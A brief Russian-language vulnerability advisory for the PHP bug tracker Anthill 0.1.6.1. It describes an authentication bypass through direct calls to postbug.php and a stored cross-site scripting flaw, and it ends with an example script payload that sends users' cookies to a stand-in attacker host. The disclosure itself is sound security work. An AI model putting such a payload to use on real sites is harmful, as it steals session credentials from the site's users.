Anthill - система отслеживания ошибок (bug tracking) написанная
на PHP.
1.Anthill содержит компонент postbug.php, который используется для обработки ошибок и добавления их в базу данных. При добавлении ошибки пользователи проходят аутентификацию в сценарии enterbug.php, который затем передает информацию для обработки к postbug.php. Поскольку
postbug не требует никакой идентификации, нападающий может передавать команды непосредственно к postbug.php (через URL или, создавая соответствующую форму на удаленном Web-сервере), таким образом
обходится механизм авторизации в enterbug.php.
2. Anthill не санирует пользовательский ввод, позволяя авторизованному
человеку вставлять произвольный HTML или JavaScript код при публикации ошибки. Этот код будет выполнен в браузерах других пользователей
при просмотре страницы с опубликованной
ошибкой.
Поскольку Anthill использует cookies для подтверждения подлинности пользователей, уязвимость может использоваться для перехвата опознавательных мандатов других пользователей.
Пример:
<script>self.location.href="http://www.evilsite.com/evil?"+escape(document
cookie)</script>
Уязвимость обнаружена в Anthill 0.1.6.1.
